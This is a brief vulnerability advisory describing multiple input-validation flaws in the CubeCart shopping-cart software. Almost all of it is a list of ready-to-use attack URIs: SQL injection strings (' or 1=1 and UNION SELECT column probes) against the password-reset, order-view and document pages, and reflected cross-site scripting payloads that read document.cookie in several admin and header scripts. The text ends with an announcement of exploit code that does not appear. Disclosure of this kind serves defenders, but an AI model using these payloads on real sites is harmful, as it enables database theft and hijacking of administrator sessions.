|
CubeCart Multiple Input Validation Vulnerabilities
Attackers can exploit these issues via a web client. Example URIs have been provided: http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/* http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/* http://www.example.com/view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30/* http://www.example.com/view_doc.php?view_doc=-1'%20union%20select%201,2/* http://www.example.com/admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30/* http://www.example.com/admin/print_order.php?order_id=<script>alert(document.cookie);</script> http://www.example.com/view_order.php?order_id=<script>alert(document.cookie);</script> http://www.example.com/admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript> http://www.example.com/admin/nav.php?la_search_home=<script>alert(document.cookie);</script> http://www.example.com/admin/image.php?image=<script>alert(document.cookie);</script> http://www.example.com/admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script> http://www.example.com/admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script> http://www.example.com/admin/header.inc.php?charset='><script>alert(document.cookie);</script> http://www.example.com/footer.inc.php?la_pow_by=<script>alert(document.cookie);</script> http://www.example.com/header.inc.php?site_name=</title><script>alert(document.cookie);</script> Sample exploit code has been provided: |
|
 Privacy Statement |
